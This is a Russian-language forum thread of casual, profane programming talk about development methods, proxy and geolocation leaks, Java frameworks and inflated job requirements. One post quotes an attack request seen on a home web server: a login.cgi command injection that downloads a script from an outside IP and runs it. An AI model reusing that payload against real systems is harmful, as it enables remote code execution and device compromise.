Перейти к публикации
  • Сейчас на странице   Всего пользователей: 0   (0 пользователей, 0 гостей)

Rooster

Программирование, т. 8

315 пользователей проголосовало

У вас нет прав на голосование в этом опросе, или на просмотр результатов опроса. Пожалуйста, войдите или зарегистрируйтесь для голосования в опросе.

Рекомендованные сообщения

а что есть еще кроме агиле и вотерфлоу? 

да, вотерфол, но у кого-то это флоу :trollface: 

ППР

Публикация отключена

Поделиться сообщением

ППРПроект производства работ — документ, в котором детально прорабатываются вопросы рациональной технологии и организации строительства

а чё, архитектура есть, далее строим

Feanaro понравилось это

Поделиться сообщением

некоторые сайты все таки расскрывают, что я из рф, хотя включен прокси. Заходишь на сайт, а они сразу тебя в ру сегмент закидывают. Как они это делают и могу ли я с этим что-то сделать?

1x.webp

Поделиться сообщением

Режим инкогнито + вырубить в винде определение расположения. По идее должно помочь.

coNNNon понравилось это

DB

59221730.png

Я - гений, ёпта

bfe7003be27e8e81ce6a7d2d8192e9ae.jpg

22

msg-93176-0-72842500-1438846470_thumb.jpg

Поделиться сообщением

(изменено)

Шапку-ушанку сними или вебку заклей

Изменено пользователем Rooster
Arzanis, coNNNon и TheDeadSkin понравилось это

Shaman.png.0cdd33d48561cd068bb3c5ee78289381.png Anna.jpeg.03c9b49363298ceec256500a5d522f7d.jpeg Nigga.jpg.f807f2556bdbf68452292a9301494591.jpg

Поделиться сообщением

некоторые сайты все таки расскрывают, что я из рф, хотя включен прокси. Заходишь на сайт, а они сразу тебя в ру сегмент закидывают. Как они это делают и могу ли я с этим что-то сделать?

navigator.language || navigator.userLanguage;
coNNNon понравилось это

<< твой комментарий очень важен для форума.

Поделиться сообщением

navigator.language || navigator.userLanguage;

browser.time!=ip.time || browser.timezone!=ip.timezone

Поделиться сообщением

сегодня утром поднял простейший веб сервер на Orange PI

токачто прилетело :lol:

/login.cgi?cli=aa aa';wget http://46.166.185.42/e -O -> /tmp/hk;sh /tmp/hk'$

:lol: :lol:

Поделиться сообщением

молдавские хакеры?

Публикация отключена

Поделиться сообщением

бля! у меня 2 орпндпи лежат не распакованные полгода уж. Нужно достать пыль стряхнуть!

Поделиться сообщением

(изменено)

я дико извиняюсь что тему снова поднял

но какого хуя василий стажер блядь должен вмочь в спринг блядь ! мвц томкат вуе и вот жто вот все нахуй

они там ебанулись что ли блять или вакансии попутали

я из всего то там смогу томкат поднять и джовку (api) запустить на нем + бд допустим дальше не читал

я как то хотел спринг дб/спринг дата заюзать так я ахуел от ебучих хмл блядь и прочей залупы спринга  :fffuuu:  :fffuuu: в итоге чистый гибернейт взял и не ебал себе мозг

Изменено пользователем choojoykin

:buba:

ни мало ни много, а много и мало

Поделиться сообщением

я дико извиняюсь что тему снова поднял

но какого хуя василий стажер блядь должен вмочь в спринг блядь ! мвц томкат вуе и вот жто вот все нахуй

лол

постоянно видел на фрилансе требования "опыт работы с .net 4.5 10 лет", опыт работы с "nodejs более 5 лет"(это еще в 12-13 год когда оно только вылупилось)

сам участвовал на таких собеседованиях

помню причину отказа мне-"а у вас бумажка есть заверяющая ваши знания???", нет офк, "мы платим только за наличие знаний"(непомню формулировки точно,както так)

из пары десятков работ с "космическими требованиями"(по которым я не прохожу, первый раз вижу и язык и фреймворк/либы, а нужны десятилетия опыта) получил лишь пару отказов, где нужны были деревянные бумажки с семью печатями, либо бюрократию по пересылки документов ставили выше самой работы

Поделиться сообщением

лошье ебаное, вот Диман с рождения умеет это все, скажите ещё генетическую лотерею выиграл ага

Поделиться сообщением

я как то хотел спринг дб/спринг дата заюзать так я ахуел от ебучих хмл блядь и прочей залупы спринга  :fffuuu:  :fffuuu: в итоге чистый гибернейт взял и не ебал себе мозг

че

Со спринг бутом все изи делается, там вообще никаких конфигов писать не надо 

Поделиться сообщением

че

Со спринг бутом все изи делается, там вообще никаких конфигов писать не надо 

причем левой пяткой.

Поделиться сообщением

нахуй мне весь бут лол

мне работу с бд надо было красиво сделать и все епт  :mameprivet:

:buba:

ни мало ни много, а много и мало

Поделиться сообщением

Пиздос, ещё и дефают этих хуесосов, которые такие требование пишут, вы шо ебанулись?)))

Saying that Java is nice because it works on all OS's is like saying that anal sex is nice because it works on all genders.

Поделиться сообщением

кто дефает?

в любом случае все требования согласуются лично, и там уже до всего можно дговориться и сделать свою работу

челики которые доебываются до требований "а у вас было написано только высокие блондины, вы должны меня взять" и "мыж написали без записки из военкомата не приходить" должны исчезнуть, с обоих сторон

Поделиться сообщением

не, ну понятно шо дебиксы, и дебиксы те кто идут туда работать

но я встречал людей, которые на полном серьезе утверждали мол: "ну и шо шо зп меньше рынка, зато у нас смузи, печеньки, кресла-мешки и спортзал"

так что тут уже такое, у меня вон тестовое задание на миддло-синьора было в 30 строчек на питоне (но делал в офисе на собеседовании, дали чет типа полчаса с возможностью гуглить итд)

домашнее задание - максимум пара часов на скале (распарсить и обработать логфайл)

Поделиться сообщением

так то смузишная с зп ниже рынка это ок

я порой думаю как же меня заебал ынтырпрайз и как же я не знаю что делать с бабками на счету и изи бы променял больше бабок на более вдохновляющую работу

но я говорю именно про реально созданную атмосферу внутри компании а не про печеньки, спортзал и новый крутой офис для галочки

очень крутые котейки

RqvSzvr.png

Кому-то пизды дал - нужно сделать скрин обязательно. (с) Solo

Поделиться сообщением

Гость
Эта тема закрыта для публикации сообщений.

• Создать...